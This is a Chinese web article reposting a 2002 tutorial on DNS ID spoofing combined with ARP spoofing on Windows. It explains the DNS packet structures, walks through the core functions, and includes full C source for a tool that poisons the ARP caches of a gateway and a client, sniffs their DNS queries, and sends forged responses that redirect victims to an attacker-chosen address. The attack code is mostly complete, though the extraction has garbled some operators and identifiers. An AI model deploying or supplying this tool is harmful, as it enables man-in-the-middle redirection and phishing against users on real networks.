分享
 
 
 

Windows下DNS ID欺骗的原理与实现

王朝system·作者佚名  2008-05-31
窄屏简体版  字體: |||超大  

域名系统(DNS)是一种用于TCP/IP应用程序的分布式数据库,它提供主机名字和IP地址之间的转换信息。通常,网络用户通过UDP协议和DNS服务器进行通信,而服务器在特定的53 端口监听,并返回用户所需的相关信息。

一.DNS协议的相关数据结构

DNS数据报:

typedef strUCt dns

{

unsigned short id;

//标识,通过它客户端可以将DNS的请求与应答相匹配;

unsigned short flags;

//标志:[QR opcode AA TC RD RA zero rcode ]

unsigned short quests;

//问题数目;

unsigned short answers;

//资源记录数目;

unsigned short author;

//授权资源记录数目;

unsigned short addition;

//额外资源记录数目;

}DNS,*PDNS;

在16位的标志中:QR位判定是查询/响应报文,opcode区别查询类型,AA判定是否为授权回答,TC判定是否可截断,RD判定是否期望递归查询,RA判定是否为可用递归,zero必须为0,rcode为返回码字段。

DNS查询数据报:

typedef struct query

{

unsinged char*name;

//查询的域名,这是一个大小在0到63之间的字符串;

unsigned short type;

//查询类型,大约有20个不同的类型

unsigned short classes;

//查询类,通常是A类既查询IP地址。

}QUERY,*PQUERY;

DNS响应数据报:

typedef struct response

{

unsigned short name;

//查询的域名

unsigned short type;

//查询类型

unsigned short classes;

//类型码

unsigned int ttl;

//生存时间

unsigned short length;

//资源数据长度

unsigned int addr;

//资源数据

}RESPONSE,*PRESPONSE;

二.Windows下DNS ID欺骗的原理

我们可以看到,在DNS数据报头部的id(标识)是用来匹配响应和请求数据报的。现在,让我们来看看域名解析的整个过程。客户端首先以特定的标识向DNS服务器发送域名查询数据报,在DNS服务器查询之后以相同的ID号给客户端发送域名响应数据报。这时客户端会将收到的DNS响应数据报的ID和自己发送的查询数据报ID相比较,假如匹配则表明接收到的正是自己等待的数据报,假如不匹配则丢弃之。

假如我们能够伪装DNS服务器提前向客户端发送响应数据报,那么客户端的DNS缓存里域名所对应的IP就是我们自定义的IP了,同时客户端也就被带到了我们希望的网站。条件只有一个,那就是我们发送的ID匹配的DSN响应数据报在DNS服务器发送的响应数据报之前到达客户端。下图清楚的展现了DNS ID欺骗的过程:

Client <--response-- . . . . . .. . . . . . . . . . DNS Server

<--[a.b.c == 112.112.112.112]-- Your Computer

到此,我想大家都知道了DNS ID欺骗的实质了,那么如何才能实现呢?这要分两种情况:

1. 本地主机与DNS服务器,本地主机与客户端主机均不在同一个局域网内,方法有以下几种:向客户端主机随机发送大量DNS响应数据报,命中率很低;向DNS服务器发起拒绝服务攻击,太粗鲁;BIND漏洞,使用范围比较窄。

2. 本地主机至少与DNS服务器或客户端主机中的某一台处在同一个局域网内:我们可以通过ARP欺骗来实现可靠而稳定的DNS ID欺骗,下面我们将具体讨论这种情况。

首先我们进行DNS ID欺骗的基础是ARP欺骗,也就是在局域网内同时欺骗网关和客户端主机(也可能是欺骗网关和DNS服务器,或欺骗DNS服务器和客户端主机)。我们以客户端的名义向网关发送ARP响应数据报,不过其中将源MAC地址改为我们自己主机的MAC地址;同时以网关的名义向客户端主机发送ARP响应数据报,同样将源MAC地址改为我们自己主机的MAC地址。这样以来,网关看来客户端的MAC地址就是我们主机的MAC地址;客户端也认为网关的MAC地址为我们主机的MAC地址。由于在局域网内数据报的传送是建立在MAC地址之上了,所以网关和客户端之间的数据流通必须先通过本地主机。

在监视网关和客户端主机之间的数据报时,假如发现了客户端发送的DNS查询数据报(目的端口为53),那么我们可以提前将自己构造的DNS响应数据报发送到客户端。注重,我们必须提取有客户端发送来的DNS查询数据报的ID信息,因为客户端是通过它来进行匹配认证的,这就是一个我们可以利用的DNS漏洞。这样客户端会先收到我们发送的DNS响应数据报并访问我们自定义的网站,虽然客户端也会收到DNS服务器的响应报文,不过已经来不及了,哈哈。

三.核心代码分析

主程序创建两个线程,一个线程进行实时的ARP欺骗,另一个线程监听接收到的数据报,若发现有域名服务查询数据报,则立即向客户端发送自定义的DSN响应数据报。测试环境:Windows2000 + VC6.0 + Winpcap_3.0_alpha,注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1。

1.sniff线程:

PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS);

//将网卡设置为混杂模式

PacketSetBuff(lpadapter,500*1024);

//设置网络适配器的内核缓存;

PacketSetReadTimeout(lpadapter,1);

//设置等待时间;

PacketReceivePacket(lpadapter,lppacketr,TRUE);

//接收网络数据报;

checksum((USHORT *)temp,sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

//计算校验和;

PacketInitPacket(lppackets,sendbuf,sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+4+sizeof(RESPONSE));

//初始化一个_PACKET结构,发送DNS响应数据报;

2.arpspoof线程;

PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

//初始化ARP响应数据报;

PacketSendPacket(lpadapter,lppackets,TRUE);

//发送ARP欺骗的响应数据报;

3.getmac()函数

GetAdaptersInfo(padapterinfo,&adapterinfosize);

//获取网络适配器的属性;

SendARP(destip,0,pulmac,&ullen);

//发送ARP请求数据报,过去网络主机的MAC地址;

4.main()函数

PacketGetAdapterNames((char *)adaptername,&adapterlength);

//获得本地主机的网络适配器列表和描述;

lpadapter=PacketOpenAdapter(adapterlist[open-1]);

//打开指定的网络适配器;

CreateThread(NULL,0,sniff,NULL,0,&threadrid);

CreateThread(NULL,0,arpspoof,NULL,0,&threadsid);

//创建两个线程;

WaitForMultipleObjects(2,thread,FALSE,INFINITE);

//等待其中的某个线程结束;

四.小结与后记

局域网内的网络安全是一个值得大家关注的问题,往往轻易发起各种欺骗攻击,这是局域网自身的属性所决定的--网络共享。本文所讲解的DNS ID欺骗是基于ARP欺骗之上的网络攻击,假如在广域网上,则比较麻烦。不过也有一些例外情况:假如IE中使用代理服务器,欺骗不能进行,因为这时客户端并不会在本地进行域名请求;假如你访问的不是网站主页,而是相关子目录的文件,这样你在自定义的网站上不会找到相关的文件,登陆以失败告终。假如你不幸被欺骗了,先禁用本地连接,然后启用本地连接就可以清除DNS缓存。

五.附件源代码

#include <packet32.h>

#include <iphlpapi.h>

#include <stdio.h>

#define ETH_IP 0x0800

#define ETH_ARP0x0806

#define ARP_REQUEST0x0001

#define ARP_REPLY0x0002

#define ARP_HARDWARE 0x0001

#define MAX_NUM_ADAPTER10

#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020

#pragma pack(push,1)

typedef struct ethdr

{

unsigned chareh_dst[6];

unsigned chareh_src[6];

unsigned short eh_type;

}ETHDR,*PETHDR;

typedef struct arphdr

{

unsigned shortarp_hdr;

unsigned shortarp_pro;

unsigned char arp_hln;

unsigned char arp_pln;

unsigned shortarp_opt;

unsigned char arp_sha[6];

unsigned long arp_spa;

unsigned char arp_tha[6];

unsigned long arp_tpa;

}ARPHDR,*PARPHDR;

typedef struct iphdr

{

unsigned charh_lenver;

unsigned chartos;

unsigned short total_len;

unsigned short ident;

unsigned short frag_and_flags;

unsigned charttl;

unsigned charprotocol;

unsigned short checksum;

unsigned int sourceip;

unsigned int destip;

}IPHDR,*PIPHDR;

typedef struct psd

{

unsigned int saddr;

unsigned int daddr;

char mbz;

char ptcl;

unsigned short udpl;

}PSD,*PPSD;

typedef struct udphdr

{

unsigned short souceport;

unsigned short destport;

unsigned short length;

unsigned short checksum;

}UDPHDR,*PUDPHDR;

typedef struct dns

{

unsigned short id;

unsigned short flags;

unsigned short quests;

unsigned short answers;

unsigned short author;

unsigned short addition;

}DNS,*PDNS;

typedef struct query

{

unsigned short type;

unsigned short classes;

}QUERY,*PQUERY;

typedef struct response

{

unsigned short name;

unsigned short type;

unsigned short classes;

unsigned int ttl;

unsigned short length;

unsigned int addr;

}RESPONSE,*PRESPONSE;

#pragma pack(pop)

unsigned short checksum(USHORT *buffer,int size)

{

unsigned long cksum=0;

while(size>1)

{

cksum+=*buffer++;

size-=sizeof(unsigned short);

}

if(size)

cksum+=*buffer;

cksum=(cksum>>16)+(cksum & 0xffff);

cksum+=(cksum>>16);

return (unsigned short)(~cksum);

}

LPADAPTER lpadapter=0;

LPPACKETlppacketr,lppackets;

IPAddrmyip,firstip,secondip,virtualip;

UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0};

charadapterlist[MAX_NUM_ADAPTER][1024];

void start()

{

printf("===[ T-DNS Spoof, by TOo2y ]===\n");

printf("===[ TOo2y@safechina.net ]===\n");

printf("===[ Homepage: www.safechina.net ]===\n");

printf("===[ Date: 10-15-2002]===\n\n");

return;

}

void usage()

{

printf("Usage:T-DNSFirstipSecondipVirtualip\n");

return;

}

DWord WINAPI sniff(LPVOID no)

{

printf("\nI am sniffing...\n");

char *buf;

char *pchar;

char temp[1024];

char sendbuf[1024];

char recvbuf[1024*250];

struct bpf_hdr *hdr;

unsigned char*dname;

unsigned longulbytesreceived,off,ulen;

ETHDRethr,eths;

IPHDRipr,ips;

PSDpsds;

UDPHDR udpr,udps;

DNSdnsr,dnss;

QUERYqueryr,querys;

RESPONSE responses;

if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)

{

printf("Warning: Unable to set the adapter to promiscuous mode!\n");

}

if(PacketSetBuff(lpadapter,500*1024)==FALSE)

{

printf("PacketSetBuff Error: %d\n",GetLastError());

return -1;

}

if(PacketSetReadTimeout(lpadapter,1)==FALSE)

{

printf("Warning: Unable to set the timeout!\n");

}

if((lppacketr=PacketAllocatePacket())==FALSE)

{

printf("PacketAllocatePacket Receive Error: %d\n",GetLastError());

return -1;

}

PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));

while(1)

{

if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE)

{

break;

}

ulbytesreceived=lppacketr->ulBytesReceived;

buf=(char *)lppacketr->Buffer;

off=0;

while(off<ulbytesreceived)

{

hdr=(struct bpf_hdr *)(buf+off);

off+=hdr->bh_hdrlen;

pchar=(char *)(buf+off);

off=Packet_WORDALIGN(off+hdr->bh_caplen);

ethr=*(ETHDR *)pchar;

if(ethr.eh_type==htons(ETH_IP))

{

ipr=*(IPHDR *)(pchar+sizeof(ETHDR));

if(ipr.protocol!=17)

{

continue;

}

if((ipr.sourceip!=secondip) && (ipr.sourceip!=firstip))

{

continue;

}

udpr=*(UDPHDR *)(pchar+sizeof(ETHDR)+sizeof(IPHDR));

ulen=ntohs(udpr.length)-sizeof(UDPHDR)-sizeof(DNS)-sizeof(QUERY);

dname=(unsigned char *)malloc(ulen*sizeof(unsigned char));

if(udpr.destport==htons(53))

{

printf("Get a DNS Packet...\t");

memset(sendbuf,0,sizeof(sendbuf));

memcpy(&dnsr,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR),sizeof(DNS));

memcpy(dname,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS),ulen);

memcpy(&queryr.type,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen,2);

memcpy(&queryr.classes,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+2,2);

responses.name=htons(0xC00C);

responses.type=queryr.type;

responses.classes=queryr.classes;

responses.ttl=0xFFFFFFFF;

responses.length=htons(4);

responses.addr=virtualip;

querys.classes=queryr.classes;

querys.type=queryr.type;

dnss.id=dnsr.id;

dnss.flags=htons(0x8180);

dnss.quests=htons(1);

dnss.answers=htons(1);

dnss.author=0;

dnss.addition=0;

udps.souceport=udpr.destport;

udps.destport=udpr.souceport;

udps.length=htons(sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

udps.checksum=0;

ips.h_lenver=(4<<4sizeof(IPHDR)/sizeof(unsigned int));

ips.tos=0;

ips.total_len=ntohs(sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

ips.ident=htons(12345);

ips.frag_and_flags=0;

ips.ttl=255;

ips.protocol=IPPROTO_UDP;

ips.checksum=0;

ips.sourceip=ipr.destip;

ips.destip=ipr.sourceip;

psds.saddr=ips.sourceip;

psds.daddr=ips.destip;

psds.mbz=0;

psds.ptcl=IPPROTO_UDP;

psds.udpl=htons(sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

memset(temp,0,sizeof(temp));

memcpy(temp,&psds,sizeof(PSD));

memcpy(temp+sizeof(PSD),&udps,sizeof(UDPHDR));

memcpy(temp+sizeof(PSD)+sizeof(UDPHDR),&dnss,sizeof(DNS));

memcpy(temp+sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS),dname,ulen);

memcpy(temp+sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen,&querys,sizeof(QUERY));

memcpy(temp+sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY),&responses,sizeof(RESPONSE));

udps.checksum=checksum((USHORT *)temp,sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

memset(temp,0,sizeof(temp));

memcpy(temp,&ips,sizeof(IPHDR));

ips.checksum=checksum((USHORT *)temp,sizeof(IPHDR));

eths.eh_type=ethr.eh_type;

memcpy(ðs.eh_src,ðr.eh_dst,6);

memcpy(ðs.eh_dst,ðr.eh_src,6);

memcpy(sendbuf,ðs,sizeof(ETHDR));

memcpy(sendbuf+sizeof(ETHDR),&ips,sizeof(IPHDR));

memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR),&udps,sizeof(UDPHDR));

memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR),&dnss,sizeof(DNS));

memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS),dname,ulen);

memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen,&querys,sizeof(QUERY));

memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY),&responses,sizeof(RESPONSE));

PacketInitPacket(lppackets,sendbuf,sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+4+sizeof(RESPONSE));

if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)

{

printf("PacketSendPacket in DNS Spoof Error: %d\n",GetLastError());

break;

}

printf("Send DNS Spoof Packet Successfully!\n");

}

}

}

}

return 0;

}

DWORD WINAPI arpspoof(LPVOID no)

{

printf("I am arpspoofing...\n\n");

char sendbuf[1024];

struct sockaddr_in fsin,ssin;

ETHDReth;

ARPHDR arp;

fsin.sin_addr.s_addr=firstip;

ssin.sin_addr.s_addr=secondip;

eth.eh_type=htons(ETH_ARP);

arp.arp_hdr=htons(ARP_HARDWARE);

arp.arp_pro=htons(ETH_IP);

arp.arp_hln=6;

arp.arp_pln=4;

arp.arp_opt=htons(ARP_REPLY);

do

{

memcpy(eth.eh_dst,fmac,6);

memcpy(arp.arp_tha,fmac,6);

arp.arp_tpa=firstip;

arp.arp_spa=secondip;

memcpy(eth.eh_src,mmac,6);

memcpy(arp.arp_sha,mmac,6);

memset(sendbuf,0,sizeof(sendbuf));

memcpy(sendbuf,ð,sizeof(eth));

memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)

{

printf("PacketSendPacket in arpspoof Error: %d\n",GetLastError());

return -1;

}

Sleep(500);

memcpy(eth.eh_dst,smac,6);

memcpy(arp.arp_tha,smac,6);

arp.arp_tpa=secondip;

arp.arp_spa=firstip;

memcpy(eth.eh_src,mmac,6);

memcpy(arp.arp_sha,mmac,6);

memset(sendbuf,0,sizeof(sendbuf));

memcpy(sendbuf,ð,sizeof(eth));

memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)

{

printf("PacketSendPacket in arpspoof Error: %d\n",GetLastError());

return -1;

}

Sleep(500);

}while(1);

return 0;

}

BOOL getmac()

{

HRESULThr;

IPAddr destip;

ULONGpulmac[2];

ULONGullen;

DWORD err;

DWORD fixedinfosize=0;

DWORD adapterinfosize=0;

PIP_ADAPTER_INFOpadapterinfo;

PIP_ADDR_STRING paddrstr;

if((err=GetAdaptersInfo(NULL,&adapterinfosize))!=0)

{

if(err!=ERROR_BUFFER_OVERFLOW)

{

printf("GetAdapterInfo size Error: %d\n",GetLastError());

return FALSE;

}

}

if((padapterinfo=(PIP_ADAPTER_INFO)GlobalAlloc(GPTR,adapterinfosize))==NULL)

{

printf("Memory allocation Error: %d\n",GetLastError());

return FALSE;

}

if((err=GetAdaptersInfo(padapterinfo,&adapterinfosize))!=0)

{

printf("GetAdaptersInfo Error: %d\n",GetLastError());

return FALSE;

}

memcpy(mmac,padapterinfo->Address,6);

paddrstr=&(padapterinfo->IpAddressList);

myip=inet_addr(paddrstr->IpAddress.String);

ullen=6;

memset(pulmac,0xff,sizeof(pulmac));

destip=firstip;

if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR)

{

printf("SendARP firstip Error: %d\n",GetLastError());

return FALSE;

}

memcpy(fmac,pulmac,6);

memset(pulmac,0xff,sizeof(pulmac));

destip=secondip;

if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR)

{

printf("SendARP secondip Error: %d\n",GetLastError());

return FALSE;

}

memcpy(smac,pulmac,6);

return TRUE;

}

int main(int argc,char *argv[])

{

HANDLE thread[2];

WCHARadaptername[8192];

WCHAR*name1,*name2;

ULONGadapterlength;

DWORDthreadsid,threadrid;

intadapternum=0,open,i;

system("cls.exe");

start();

if(argc!=4)

{

usage();

return -1;

}

firstip=inet_addr(argv[1]);

secondip=inet_addr(argv[2]);

virtualip=inet_addr(argv[3]);

if(getmac()==FALSE)

{

return -1;

}

adapterlength=sizeof(adaptername);

if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE)

{

printf("PacketGetAdapterNames Error: %d\n",GetLastError());

return -1;

}

name1=adaptername;

name2=adaptername;

i=0;

while((*name1!='\0') (*(name1-1)!='\0'))

{

if(*name1=='\0')

{

memcpy(adapterlist[i],name2,2*(name1-name2));

name2=name1+1;

i++;

}

name1++;

}

adapternum=i;

printf("Adapters Installed: \n");

for(i=0;i<adapternum;i++)

{

wprintf(L"%d - %s\n",i+1,adapterlist[i]);

}

do

{

printf("\nSelect the number of the adapter to open: ");

scanf("%d",&open);

if(open>=1 && open<=adapternum)

break;

}while(open<1 open>adapternum);

lpadapter=PacketOpenAdapter(adapterlist[open-1]);

if(!lpadapter (lpadapter->hFile==INVALID_HANDLE_VALUE))

{

printf("PacketOpenAdapter Error: %d\n",GetLastError());

return -1;

}

if((lppackets=PacketAllocatePacket())==FALSE)

{

printf("PacketAllocatePacket Send Error: %d\n",GetLastError());

return -1;

}

thread[0]=CreateThread(NULL,0,sniff,NULL,0,&threadrid);

if(thread[0]==NULL)

{

printf("CreateThread for sniffer Error: %d\n",GetLastError());

return -1;

}

thread[1]=CreateThread(NULL,0,arpspoof,NULL,0,&threadsid);

if(thread[1]==NULL)

{

printf("CreateThread for arpspoof Error: %d\n",GetLastError());

return -1;

}

WaitForMultipleObjects(2,thread,FALSE,INFINITE);

CloseHandle(thread[0]);

CloseHandle(thread[1]);

PacketFreePacket(lppackets);

PacketFreePacket(lppacketr);

PacketCloseAdapter(lpadapter);

return 0;

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有